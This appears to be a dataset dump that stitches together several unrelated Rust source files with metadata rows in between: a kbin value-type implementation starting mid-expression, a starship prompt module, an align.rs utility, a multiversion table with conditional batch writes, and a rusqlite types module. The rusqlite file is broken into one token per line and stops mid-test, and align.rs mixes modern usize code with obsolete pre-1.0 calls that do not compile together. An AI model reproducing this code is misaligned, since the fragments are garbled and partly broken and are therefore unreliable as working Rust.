node_type: StandardType::S16,
value: value.clone(),
}),
}
}
pub fn as_u16(&self) -> Result<u16> {
match self {
Value::U16(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U16,
value: value.clone(),
}),
}
}
pub fn as_i32(&self) -> Result<i32> {
match self {
Value::S32(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::S32,
value: value.clone(),
}),
}
}
pub fn as_u32(&self) -> Result<u32> {
match self {
Value::U32(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U32,
value: value.clone(),
}),
}
}
pub fn as_i64(&self) -> Result<i64> {
match self {
Value::S64(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::S64,
value: value.clone(),
}),
}
}
pub fn as_u64(&self) -> Result<u64> {
match self {
Value::U64(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U64,
value: value.clone(),
}),
}
}
pub fn as_slice(&self) -> Result<&[u8]> {
match self {
Value::Binary(ref data) => Ok(data),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Binary,
value: value.clone(),
}),
}
}
pub fn as_str(&self) -> Result<&str> {
match self {
Value::String(ref s) => Ok(s),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::String,
value: value.clone(),
}),
}
}
pub fn as_string(self) -> Result<String> {
match self {
Value::String(s) => Ok(s),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::String,
value,
}),
}
}
pub fn as_attribute(self) -> Result<String> {
match self {
Value::Attribute(s) => Ok(s),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Attribute,
value,
}),
}
}
pub fn as_binary(&self) -> Result<&[u8]> {
match self {
Value::Binary(ref data) => Ok(data),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Binary,
value: value.clone(),
}),
}
}
pub fn as_array(&self) -> Result<&ValueArray> {
match self {
Value::Array(ref values) => Ok(values),
value => Err(KbinError::ExpectedValueArray {
value: value.clone(),
}),
}
}
pub fn into_binary(self) -> Result<Vec<u8>> {
match self {
Value::Binary(data) => Ok(data),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Binary,
value,
}),
}
}
}
// Owned conversion to raw bytes; accepts either encoding of a byte sequence.
impl TryFrom<Value> for Vec<u8> {
  type Error = KbinError;
  fn try_from(value: Value) -> Result<Self> {
    // An array of unsigned 8-bit integers can either be `Binary` or a literal
    // array of unsigned 8-bit integers.
    match value {
      Value::Binary(data) => Ok(data),
      Value::Array(values) => match values {
        ValueArray::U8(values) => Ok(values),
        values => Err(KbinError::ValueTypeMismatch {
          node_type: StandardType::U8,
          value: Value::Array(values),
        }),
      },
      value => Err(KbinError::ValueTypeMismatch {
        node_type: StandardType::Binary,
        value,
      }),
    }
  }
}
// Borrowed counterpart of the owned impl above: clones the payload out.
impl TryFrom<&Value> for Vec<u8> {
  type Error = KbinError;
  fn try_from(value: &Value) -> Result<Self> {
    match value {
      Value::Binary(ref data) => Ok(data.to_vec()),
      Value::Array(ref values) => match values.clone() {
        ValueArray::U8(values) => Ok(values),
        values => Err(KbinError::ValueTypeMismatch {
          node_type: StandardType::U8,
          value: Value::Array(values),
        }),
      },
      value => Err(KbinError::ValueTypeMismatch {
        node_type: StandardType::Binary,
        value: value.clone(),
      }),
    }
  }
}
// `String` values convert into an owned `Cow`; all other variants error.
impl TryFrom<Value> for Cow<'_, str> {
  type Error = KbinError;
  fn try_from(value: Value) -> Result<Self> {
    match value {
      Value::String(v) => Ok(Cow::Owned(v)),
      value => Err(KbinError::ValueTypeMismatch {
        node_type: StandardType::String,
        value,
      }),
    }
  }
}
// Borrowed counterpart: the inner string is cloned, so the `Cow` is still
// `Owned` (a borrowed `Cow` would tie its lifetime to `value`).
impl TryFrom<&Value> for Cow<'_, str> {
  type Error = KbinError;
  fn try_from(value: &Value) -> Result<Self> {
    match value {
      Value::String(ref v) => Ok(Cow::Owned(v.clone())),
      value => Err(KbinError::ValueTypeMismatch {
        node_type: StandardType::String,
        value: value.clone(),
      }),
    }
  }
}
// Raw byte buffers always map to the `Binary` variant (never `Array(U8)`).
impl From<Vec<u8>> for Value {
  fn from(value: Vec<u8>) -> Value {
    Value::Binary(value)
  }
}
impl fmt::Debug for Value {
  fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
    // Local macro: `display` variants render their payload with `Display`,
    // `debug` variants with `Debug`; `Binary`/`Array` get bespoke arms.
    macro_rules! field {
      (
        display: [$($konst_display:ident),*],
        debug: [$($konst_debug:ident),*]
      ) => {
        match *self {
          $(
            Value::$konst_display(ref v) => write!(f, concat!(stringify!($konst_display), "({})"), v),
          )*
          $(
            Value::$konst_debug(ref v) => write!(f, concat!(stringify!($konst_debug), "({:?})"), v),
          )*
          Value::Binary(ref v) => write!(f, "Binary(0x{:02x?})", v),
          Value::Array(ref value) => if f.alternate() {
            write!(f, "Array({:#?})", value)
          } else {
            write!(f, "Array({:?})", value)
          },
        }
      };
    }
    field! {
      display: [
        S8, S16, S32, S64,
        U8, U16, U32, U64,
        Float, Double, Boolean
      ],
      debug: [
        String, Time, Ip4,
        Attribute,
        S8_2, U8_2, S16_2, U16_2, S32_2, U32_2, S64_2, U64_2, Float2, Double2, Boolean2,
        S8_3, U8_3, S16_3, U16_3, S32_3, U32_3, S64_3, U64_3, Float3, Double3, Boolean3,
        S8_4, U8_4, S16_4, U16_4, S32_4, U32_4, S64_4, U64_4, Float4, Double4, Boolean4,
        Vs16, Vu16,
        Vs8, Vu8, Vb
      ]
    }
  }
}
impl fmt::Display for Value {
  fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
    // Local macro: `simple` delegates to the payload's `Display`; `tuple`
    // space-separates the elements; `value` space-separates elements but
    // routes each through the matching scalar variant's arm below (so
    // float/bool tuples share the scalar formatting rules).
    macro_rules! display_value {
      (
        simple: [$($simple:ident),*],
        tuple: [$($tuple:ident),*],
        value: [$($parent:ident => [$($child:ident),*]),*]
      ) => {
        match self {
          $(
            Value::$simple(v) => fmt::Display::fmt(v, f),
          )*
          $(
            Value::$tuple(values) => {
              for (i, v) in values.iter().enumerate() {
                if i > 0 {
                  f.write_str(" ")?;
                }
                fmt::Display::fmt(v, f)?;
              }
              Ok(())
            },
          )*
          $(
            $(
              Value::$child(values) => {
                for (i, v) in values.iter().enumerate() {
                  if i > 0 {
                    f.write_str(" ")?;
                  }
                  fmt::Display::fmt(&Value::$parent(*v), f)?;
                }
                Ok(())
              },
            )*
          )*
          Value::Binary(buf) => {
            // Lowercase hex, two digits per byte, no separators.
            for n in buf {
              write!(f, "{:02x}", n)?;
            }
            Ok(())
          },
          Value::Float(n) => write!(f, "{:.6}", n),
          Value::Double(n) => write!(f, "{:.6}", n),
          Value::Boolean(b) => match b {
            true => f.write_str("1"),
            false => f.write_str("0"),
          },
        }
      };
    }
    display_value! {
      simple: [
        S8, U8, S16, U16, S32, U32, S64, U64,
        String, Ip4, Time, Attribute,
        Array
      ],
      tuple: [
        S8_2, U8_2, S16_2, U16_2, S32_2, U32_2, S64_2, U64_2,
        S8_3, U8_3, S16_3, U16_3, S32_3, U32_3, S64_3, U64_3,
        S8_4, U8_4, S16_4, U16_4, S32_4, U32_4, S64_4, U64_4,
        Vs8, Vu8, Vs16, Vu16
      ],
      value: [
        Float => [Float2, Float3, Float4],
        Double => [Double2, Double3, Double4],
        Boolean => [Boolean2, Boolean3, Boolean4, Vb]
      ]
    }
  }
}
// Variant list driving the `construct_types!` macro. Commented-out pairs
// (Binary, Time, Attribute) are declared by hand inside the macro because
// their conversions are irregular.
construct_types! {
  (S8, i8);
  (U8, u8);
  (S16, i16);
  (U16, u16);
  (S32, i32);
  (U32, u32);
  (S64, i64);
  (U64, u64);
  //(Binary, Vec<u8>);
  (String, String);
  (Ip4, Ipv4Addr);
  //(Time, u32);
  (Float, f32);
  (Double, f64);
  (S8_2, [i8; 2]);
  (U8_2, [u8; 2]);
  (S16_2, [i16; 2]);
  (U16_2, [u16; 2]);
  (S32_2, [i32; 2]);
  (U32_2, [u32; 2]);
  (S64_2, [i64; 2]);
  (U64_2, [u64; 2]);
  (Float2, [f32; 2]);
  (Double2, [f64; 2]);
  (S8_3, [i8; 3]);
  (U8_3, [u8; 3]);
  (S16_3, [i16; 3]);
  (U16_3, [u16; 3]);
  (S32_3, [i32; 3]);
  (U32_3, [u32; 3]);
  (S64_3, [i64; 3]);
  (U64_3, [u64; 3]);
  (Float3, [f32; 3]);
  (Double3, [f64; 3]);
  (S8_4, [i8; 4]);
  (U8_4, [u8; 4]);
  (S16_4, [i16; 4]);
  (U16_4, [u16; 4]);
  (S32_4, [i32; 4]);
  (U32_4, [u32; 4]);
  (S64_4, [i64; 4]);
  (U64_4, [u64; 4]);
  (Float4, [f32; 4]);
  (Double4, [f64; 4]);
  //(Attribute, String);
  // no 47 — node type id 47 has no variant here (appears unused by the
  // format; NOTE(review): confirm against the kbin node-type table)
  (Vs8, [i8; 16]);
  (Vu8, [u8; 16]);
  (Vs16, [i16; 8]);
  (Vu16, [u16; 8]);
  (Boolean, bool);
  (Boolean2, [bool; 2]);
  (Boolean3, [bool; 3]);
  (Boolean4, [bool; 4]);
  (Vb, [bool; 16]);
}
| true |
d6ffcd52b234e81073dfd38af9ddcfe220e06fd1
|
Rust
|
baitcenter/starship
|
/src/modules/character.rs
|
UTF-8
| 1,450 | 3.390625 | 3 |
[
"ISC"
] |
permissive
|
use super::{Context, Module};
use ansi_term::Color;
/// Creates a module for the prompt character
///
/// The character segment prints an arrow character in a color dependent on the exit-
/// code of the last executed command:
/// - If the exit-code was "0", the arrow will be formatted with `COLOR_SUCCESS`
/// (green by default)
/// - If the exit-code was anything else, the arrow will be formatted with
/// `COLOR_FAILURE` (red by default)
pub fn module<'a>(context: &'a Context) -> Option<Module<'a>> {
    const SUCCESS_CHAR: &str = "➜";
    const FAILURE_CHAR: &str = "✖";
    // Styles are built bold once here; the original also re-applied
    // `.bold()` at each `set_style` call site, which was redundant.
    let color_success = Color::Green.bold();
    let color_failure = Color::Red.bold();

    let mut module = context.new_module("character")?;
    module.get_prefix().set_value("");

    let arguments = &context.arguments;
    let use_symbol = module
        .config_value_bool("use_symbol_for_status")
        .unwrap_or(false);
    // A missing status code is treated as success so a fresh prompt is green.
    let exit_success = arguments.value_of("status_code").unwrap_or("0") == "0";

    /* If an error symbol is set in the config, use symbols to indicate
    success/failure, in addition to color */
    let symbol = if use_symbol && !exit_success {
        module.new_segment("error_symbol", FAILURE_CHAR)
    } else {
        module.new_segment("symbol", SUCCESS_CHAR)
    };

    symbol.set_style(if exit_success {
        color_success
    } else {
        color_failure
    });

    Some(module)
}
| true |
1c6c519578e06b49c64df78b8397c8dfab63d581
|
Rust
|
adarqui/small-bites
|
/rust/misc/align.rs
|
UTF-8
| 476 | 2.9375 | 3 |
[] |
no_license
|
use std::os;
/// Rounds `size` up to the next multiple of `align`.
///
/// `align` must be a non-zero power of two: the bit-mask trick below is only
/// valid under that assumption (the original only asserted `align != 0`,
/// silently producing wrong answers for non-power-of-two alignments).
/// Modernized from pre-1.0 Rust (`uint` no longer exists).
fn align_to(size: usize, align: usize) -> usize {
    assert!(align.is_power_of_two(), "alignment must be a power of two");
    (size + align - 1) & !(align - 1)
}
/// Prints a single unsigned integer on its own line.
/// (Unused debug helper, kept for parity with the original; modernized from
/// pre-1.0 Rust, where the `uint` type no longer exists.)
#[allow(dead_code)] // only referenced from commented-out code in `main`
fn print_uint(x: usize) {
    println!("{}", x);
}
// Entry point: reads `size` (argv[1]) and `align` (argv[2]) from the command
// line, rounds `size` up to a multiple of `align`, and prints the result.
//
// NOTE(review): this targets a pre-1.0 Rust toolchain (`uint`, `from_str`,
// `std::os::args`). The `unwrap()` calls panic on a missing or non-numeric
// argument — acceptable for a scratch tool, but worth hardening if reused.
fn main() {
    // argv[0] is the program name; user input starts at argv[1].
    let argv = os::args();
    let size = from_str::<uint>(argv[1]).unwrap();
    // println!("{}",size);
    let align = from_str::<uint>(argv[2]).unwrap();
    // println!("{}", align);
    let aligned = align_to(size,align);
    println!("{} by {} = {}", size, align, aligned);
    // print_uint(*argv[1]);
}
| true |
0a697884dcadc9e65cbb6a18086fcdf54e47af5b
|
Rust
|
placrosse/experiments
|
/conditional-batch-write/rust/src/main.rs
|
UTF-8
| 7,072 | 2.703125 | 3 |
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
/*
* Copyright 2015 Treode, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#![feature(collections)]
#![feature(slice_patterns)]
extern crate rand;
extern crate time;
use std::collections::{BTreeMap, HashMap};
use std::collections::Bound::{Included, Unbounded};
use std::vec::Vec;
use rand::thread_rng;
use rand::distributions::Sample;
use rand::distributions::range::Range;
// A value read from the table together with the logical time at which it
// was written. `Default` yields `{ v: 0, t: 0 }`, returned for keys that
// have never been written.
#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)]
struct Value {
    pub v: i32,
    pub t: u32
}
// A key/value pair to be written to the table. It carries no timestamp:
// the table assigns the commit time when the write succeeds.
#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)]
struct Row {
    pub k: i32,
    pub v: i32
}
// A fully-qualified table entry as returned by `Table::scan`: key, value,
// and the logical time at which the value was written.
#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)]
struct Cell {
    pub k: i32,
    pub v: i32,
    pub t: u32
}
// Outcome of a conditional batch write.
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
enum WriteResult {
    // The batch committed at logical time `t`.
    Ok { t: u32 },
    // The batch was rejected: some row was last written at time `max`,
    // which is later than the condition time `cond` the writer read at.
    Stale { cond: u32, max: u32 }
}
// A multiversion key/value table supporting conditional batch writes.
trait Table {
    // The table's current logical time.
    fn time(&self) -> u32;
    // Read the values of `ks` as of time `t` into `vs` (parallel arrays).
    fn read(&mut self, t: u32, ks: &[i32], vs: &mut [Value]);
    // Atomically write `rs`, but only if none of the written rows changed
    // after time `t`; otherwise return `WriteResult::Stale`.
    fn write(&mut self, t: u32, rs: &[Row]) -> WriteResult;
    // Return every version of every cell in the table.
    fn scan(&self) -> Vec<Cell>;
}
// Simulates a broker repeatedly moving money between two randomly chosen
// accounts using optimistic (conditional) batch writes. Rejected transfers
// are not retried; they are merely counted, and we assert that fewer than
// half of the attempted transfers were rejected as stale.
fn broker(table: &mut Table, ntransfers: u32) {
    let mut rng = thread_rng();
    let mut account_range = Range::new(0, 100);
    let mut amount_range = Range::new(0, 1000);
    let mut stale_writes = 0;
    for _ in 0..ntransfers {
        // Pick two distinct accounts.
        let src = account_range.sample(&mut rng);
        let mut dst = account_range.sample(&mut rng);
        while dst == src {
            dst = account_range.sample(&mut rng);
        }
        let amount = amount_range.sample(&mut rng);
        // Optimistic read at the current table time...
        let read_time = table.time();
        let mut values = [Value::default(); 2];
        table.read(read_time, &[src, dst], &mut values);
        // ...followed by a write conditioned on that same time.
        let debit = Row { k: src, v: values[0].v - amount };
        let credit = Row { k: dst, v: values[1].v + amount };
        if let WriteResult::Stale { .. } = table.write(read_time, &[debit, credit]) {
            stale_writes += 1;
        }
    }
    assert!(stale_writes < ntransfers / 2);
}
// Replays the table's scan history in commit order and asserts that the sum
// of all balances is zero after every commit — money is only moved between
// accounts, never created or destroyed.
fn expect_money_conserved(table: &Table) {
    // Group scanned cells by commit time; iterating the BTreeMap then
    // yields the commits in chronological order.
    let mut history: BTreeMap<u32, Vec<Row>> = BTreeMap::new();
    for c in table.scan() {
        history.entry(c.t).or_insert(Vec::new()).push(Row { k: c.k, v: c.v });
    }
    // `tracker` holds the latest value of every key seen so far.
    let mut tracker: HashMap<i32, i32> = HashMap::new();
    for (_, rs) in history {
        for r in rs {
            tracker.insert(r.k, r.v);
        }
        // Sum by reference. The original cloned the entire HashMap on every
        // commit just to read its values — an O(n) allocation and copy per
        // iteration that `values()` avoids.
        let mut sum = 0;
        for v in tracker.values() {
            sum += *v;
        }
        assert!(sum == 0);
    }
}
// Multiversion table: each key maps to a BTreeMap from *inverted* commit
// time (`u32::max_value() - t`) to value. Inverting the key makes the
// newest version sort first in the BTreeMap.
struct HashMapOfTreeMap {
    time: u32,
    table: HashMap<i32, BTreeMap<u32, i32>>
}
impl HashMapOfTreeMap {
    // Create an empty table at logical time 0.
    pub fn new() -> HashMapOfTreeMap {
        HashMapOfTreeMap {
            time: 0,
            table: HashMap::new()
        }
    }
    // Advance the logical clock to at least `t`.
    fn raise(&mut self, t: u32) {
        if self.time < t {
            self.time = t;
        }
    }
    // Read the newest version of `k` written at or before time `t`.
    // Versions are stored under inverted keys (`u32::max_value() - time`),
    // so versions at or before `t` are exactly those with stored key >= `x`,
    // and the newest of them has the smallest stored key — hence `.min()`
    // over the range. Returns the zero `Value` for never-written keys.
    fn read_row(&self, t: u32, k: i32) -> Value {
        let x = u32::max_value() - t;
        match self.table.get(&k) {
            Some(vs) =>
                match vs.range(Included(&x), Unbounded).min() {
                    Some((t, v)) => Value { v: *v, t: u32::max_value() - *t },
                    None => Value::default()
                },
            None => Value::default()
        }
    }
    // The commit time of the newest version of `k`, or 0 if the key has
    // never been written. Because keys are inverted, the first BTreeMap
    // entry is the newest version.
    fn prepare_row(&self, k: i32) -> u32 {
        match self.table.get(&k) {
            Some(vs) =>
                match vs.iter().next() {
                    Some((x, _)) => u32::max_value() - x,
                    None => 0
                },
            None => 0
        }
    }
    // The newest commit time across all rows in `rs`; used to detect
    // conflicts with a writer's condition time.
    fn prepare_rows(&self, rs: &[Row]) -> u32 {
        let mut max = 0;
        for i in 0..rs.len() {
            let t = self.prepare_row(rs[i].k);
            if max < t {
                max = t
            }
        }
        max
    }
    // Insert one row at commit time `t` (stored under the inverted key).
    fn commit_row(&mut self, t: u32, r: Row) {
        let mut vs = self.table.entry(r.k).or_insert_with(BTreeMap::new);
        vs.insert(u32::max_value() - t, r.v);
    }
    // Advance the clock by one tick and commit every row in `rs` at the
    // new time, which is returned.
    fn commit_rows(&mut self, rs: &[Row]) -> u32 {
        self.time += 1;
        let t = self.time;
        for i in 0..rs.len() {
            self.commit_row(t, rs[i])
        }
        t
    }
}
impl Table for HashMapOfTreeMap {
    // Current logical time.
    fn time(&self) -> u32 {
        self.time
    }
    // Read each key as of time `t`, first raising the clock to `t`.
    fn read(&mut self, t: u32, ks: &[i32], vs: &mut [Value]) {
        self.raise(t);
        for i in 0..ks.len() {
            vs[i] = self.read_row(t, ks[i]);
        }
    }
    // Commit `rs` only if no written row changed after the condition time
    // `t`; otherwise report the newest conflicting commit time.
    fn write(&mut self, t: u32, rs: &[Row]) -> WriteResult {
        self.raise(t);
        let m = self.prepare_rows(rs);
        if m > t {
            return WriteResult::Stale { cond: t, max: m };
        }
        let w = self.commit_rows(rs);
        WriteResult::Ok { t: w }
    }
    // Return every version of every cell, converting stored inverted keys
    // back to real commit times. Iterates by reference rather than cloning
    // the entire table (the original `self.table.clone()` deep-copied every
    // BTreeMap just to read it once).
    fn scan(&self) -> Vec<Cell> {
        let mut cs: Vec<Cell> = Vec::new();
        for (k, vs) in &self.table {
            for (t, v) in vs {
                cs.push(Cell { k: *k, v: *v, t: u32::max_value() - *t });
            }
        }
        cs
    }
}
#[test]
fn a_table_should_read_0_for_any_key() {
    // A never-written key reads back as the zero Value.
    let mut table = HashMapOfTreeMap::new();
    let mut vs = [Value::default(); 1];
    table.read(0, &[0], &mut vs);
    // Use assert_eq! like the sibling tests instead of a slice-pattern
    // `match` with `assert!(false)` — clearer failure output, and no
    // reliance on the unstable `slice_patterns` feature in this test.
    assert_eq!(vs, [Value { v: 0, t: 0 }]);
}
#[test]
fn a_table_should_read_what_was_put() {
    // Writing a value and reading it back one tick later yields that value
    // stamped with the commit time.
    let mut table = HashMapOfTreeMap::new();
    let row = Row { k: 0, v: 1 };
    table.write(0, &[row]);
    let mut results = [Value::default(); 1];
    table.read(1, &[0], &mut results);
    assert_eq!(results, [Value { v: 1, t: 1 }]);
}
#[test]
fn a_table_should_read_and_write_batches() {
    // A two-row batch commits atomically at a single logical time.
    let mut table = HashMapOfTreeMap::new();
    let batch = [Row { k: 0, v: 1 }, Row { k: 1, v: 2 }];
    table.write(0, &batch);
    let mut results = [Value::default(); 2];
    table.read(1, &[0, 1], &mut results);
    assert_eq!(results, [Value { v: 1, t: 1 }, Value { v: 2, t: 1 }]);
}
#[test]
fn a_table_should_reject_a_stale_write() {
    let mut table = HashMapOfTreeMap::new();
    // The first write commits at time 1...
    table.write(0, &[Row { k: 0, v: 1 }]);
    // ...so a second write conditioned on time 0 must be rejected...
    let result = table.write(0, &[Row { k: 0, v: 2 }]);
    assert_eq!(result, WriteResult::Stale { cond: 0, max: 1 });
    // ...and the originally written value must remain visible.
    let mut results = [Value::default(); 1];
    table.read(1, &[0], &mut results);
    assert_eq!(results, [Value { v: 1, t: 1 }]);
}
// End-to-end check: run a single broker for 1000 transfers, then verify
// that account balances sum to zero after every commit in the history.
#[test]
fn a_table_should_preserve_the_money_supply() {
    let mut table = HashMapOfTreeMap::new();
    broker(&mut table, 1000);
    expect_money_conserved(&table);
}
// Benchmark driver: repeatedly times `nbrokers` sequential broker runs and
// reports throughput in operations per millisecond. It stops when `nhits`
// measurements have landed within `tolerance` of the running mean, after
// `ntrials` attempts, or after the one-minute wall-clock budget expires —
// whichever comes first.
fn main() {
    let nhits = 20;
    let ntrials = 2000;
    // One minute, expressed in nanoseconds.
    let nnanos = 60 * 1000 * 1000 * 1000;
    let ntransfers = 1000;
    let nbrokers = 8;
    let tolerance = 0.05;
    // Total operations per trial, for the ops/ms computation below.
    let ops = (ntransfers * nbrokers) as f64;
    let million = (1000 * 1000) as f64;
    let mut sum = 0.0;
    let mut hits = 0;
    let mut trial = 0;
    let limit = time::precise_time_ns() + nnanos;
    while hits < nhits && trial < ntrials && time::precise_time_ns() < limit {
        let mut table = HashMapOfTreeMap::new();
        let start = time::precise_time_ns();
        for _ in 0..nbrokers {
            broker(&mut table, ntransfers);
        }
        let end = time::precise_time_ns();
        let ns = (end - start) as f64;
        // ops/ms = ops / ns * 1e6.
        let x = ops / ns * million;
        sum += x;
        let n = (trial + 1) as f64;
        let mean = sum / n;
        // Relative deviation from the running mean; only measurements that
        // have stabilized near the mean count (and print) as hits.
        let dev = (x - mean).abs() / mean;
        if dev <= tolerance {
            println!("{:5} {:8.2} ops/ms ({:8.2})", trial, x, mean);
            hits += 1;
        }
        trial += 1;
    }
}
| true |
adc963923f6e51e41c840839859e1b72369ecb22
|
Rust
|
marco-c/gecko-dev-wordified-and-comments-removed
|
/third_party/rust/rusqlite/src/types/mod.rs
|
UTF-8
| 12,227 | 2.578125 | 3 |
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"LicenseRef-scancode-public-domain"
] |
permissive
|
#
!
[
cfg_attr
(
feature
=
"
time
"
doc
=
r
#
#
"
For
example
to
store
datetimes
as
i64
s
counting
the
number
of
seconds
since
the
Unix
epoch
:
use
rusqlite
:
:
types
:
:
{
FromSql
FromSqlError
FromSqlResult
ToSql
ToSqlOutput
ValueRef
}
;
use
rusqlite
:
:
Result
;
pub
struct
DateTimeSql
(
pub
time
:
:
OffsetDateTime
)
;
impl
FromSql
for
DateTimeSql
{
fn
column_result
(
value
:
ValueRef
)
-
>
FromSqlResult
<
Self
>
{
i64
:
:
column_result
(
value
)
.
and_then
(
|
as_i64
|
{
time
:
:
OffsetDateTime
:
:
from_unix_timestamp
(
as_i64
)
.
map
(
|
odt
|
DateTimeSql
(
odt
)
)
.
map_err
(
|
err
|
FromSqlError
:
:
Other
(
Box
:
:
new
(
err
)
)
)
}
)
}
}
impl
ToSql
for
DateTimeSql
{
fn
to_sql
(
&
self
)
-
>
Result
<
ToSqlOutput
>
{
Ok
(
self
.
0
.
unix_timestamp
(
)
.
into
(
)
)
}
}
"
#
#
)
]
pub
use
self
:
:
from_sql
:
:
{
FromSql
FromSqlError
FromSqlResult
}
;
pub
use
self
:
:
to_sql
:
:
{
ToSql
ToSqlOutput
}
;
pub
use
self
:
:
value
:
:
Value
;
pub
use
self
:
:
value_ref
:
:
ValueRef
;
use
std
:
:
fmt
;
#
[
cfg
(
feature
=
"
chrono
"
)
]
#
[
cfg_attr
(
docsrs
doc
(
cfg
(
feature
=
"
chrono
"
)
)
)
]
mod
chrono
;
mod
from_sql
;
#
[
cfg
(
feature
=
"
serde_json
"
)
]
#
[
cfg_attr
(
docsrs
doc
(
cfg
(
feature
=
"
serde_json
"
)
)
)
]
mod
serde_json
;
#
[
cfg
(
feature
=
"
time
"
)
]
#
[
cfg_attr
(
docsrs
doc
(
cfg
(
feature
=
"
time
"
)
)
)
]
mod
time
;
mod
to_sql
;
#
[
cfg
(
feature
=
"
url
"
)
]
#
[
cfg_attr
(
docsrs
doc
(
cfg
(
feature
=
"
url
"
)
)
)
]
mod
url
;
mod
value
;
mod
value_ref
;
#
[
derive
(
Copy
Clone
)
]
pub
struct
Null
;
#
[
derive
(
Clone
Debug
PartialEq
Eq
)
]
pub
enum
Type
{
Null
Integer
Real
Text
Blob
}
impl
fmt
:
:
Display
for
Type
{
fn
fmt
(
&
self
f
:
&
mut
fmt
:
:
Formatter
<
'
_
>
)
-
>
fmt
:
:
Result
{
match
*
self
{
Type
:
:
Null
=
>
f
.
pad
(
"
Null
"
)
Type
:
:
Integer
=
>
f
.
pad
(
"
Integer
"
)
Type
:
:
Real
=
>
f
.
pad
(
"
Real
"
)
Type
:
:
Text
=
>
f
.
pad
(
"
Text
"
)
Type
:
:
Blob
=
>
f
.
pad
(
"
Blob
"
)
}
}
}
#
[
cfg
(
test
)
]
mod
test
{
use
super
:
:
Value
;
use
crate
:
:
{
params
Connection
Error
Result
Statement
}
;
use
std
:
:
os
:
:
raw
:
:
{
c_double
c_int
}
;
fn
checked_memory_handle
(
)
-
>
Result
<
Connection
>
{
let
db
=
Connection
:
:
open_in_memory
(
)
?
;
db
.
execute_batch
(
"
CREATE
TABLE
foo
(
b
BLOB
t
TEXT
i
INTEGER
f
FLOAT
n
)
"
)
?
;
Ok
(
db
)
}
#
[
test
]
fn
test_blob
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
v1234
=
vec
!
[
1u8
2
3
4
]
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
)
VALUES
(
?
1
)
"
[
&
v1234
]
)
?
;
let
v
:
Vec
<
u8
>
=
db
.
one_column
(
"
SELECT
b
FROM
foo
"
)
?
;
assert_eq
!
(
v
v1234
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_empty_blob
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
empty
=
vec
!
[
]
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
)
VALUES
(
?
1
)
"
[
&
empty
]
)
?
;
let
v
:
Vec
<
u8
>
=
db
.
one_column
(
"
SELECT
b
FROM
foo
"
)
?
;
assert_eq
!
(
v
empty
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_str
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
s
=
"
hello
world
!
"
;
db
.
execute
(
"
INSERT
INTO
foo
(
t
)
VALUES
(
?
1
)
"
[
&
s
]
)
?
;
let
from
:
String
=
db
.
one_column
(
"
SELECT
t
FROM
foo
"
)
?
;
assert_eq
!
(
from
s
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_string
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
s
=
"
hello
world
!
"
;
db
.
execute
(
"
INSERT
INTO
foo
(
t
)
VALUES
(
?
1
)
"
[
s
.
to_owned
(
)
]
)
?
;
let
from
:
String
=
db
.
one_column
(
"
SELECT
t
FROM
foo
"
)
?
;
assert_eq
!
(
from
s
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_value
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
db
.
execute
(
"
INSERT
INTO
foo
(
i
)
VALUES
(
?
1
)
"
[
Value
:
:
Integer
(
10
)
]
)
?
;
assert_eq
!
(
10i64
db
.
one_column
:
:
<
i64
>
(
"
SELECT
i
FROM
foo
"
)
?
)
;
Ok
(
(
)
)
}
#
[
test
]
fn
test_option
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
s
=
Some
(
"
hello
world
!
"
)
;
let
b
=
Some
(
vec
!
[
1u8
2
3
4
]
)
;
db
.
execute
(
"
INSERT
INTO
foo
(
t
)
VALUES
(
?
1
)
"
[
&
s
]
)
?
;
db
.
execute
(
"
INSERT
INTO
foo
(
b
)
VALUES
(
?
1
)
"
[
&
b
]
)
?
;
let
mut
stmt
=
db
.
prepare
(
"
SELECT
t
b
FROM
foo
ORDER
BY
ROWID
ASC
"
)
?
;
let
mut
rows
=
stmt
.
query
(
[
]
)
?
;
{
let
row1
=
rows
.
next
(
)
?
.
unwrap
(
)
;
let
s1
:
Option
<
String
>
=
row1
.
get_unwrap
(
0
)
;
let
b1
:
Option
<
Vec
<
u8
>
>
=
row1
.
get_unwrap
(
1
)
;
assert_eq
!
(
s
.
unwrap
(
)
s1
.
unwrap
(
)
)
;
assert
!
(
b1
.
is_none
(
)
)
;
}
{
let
row2
=
rows
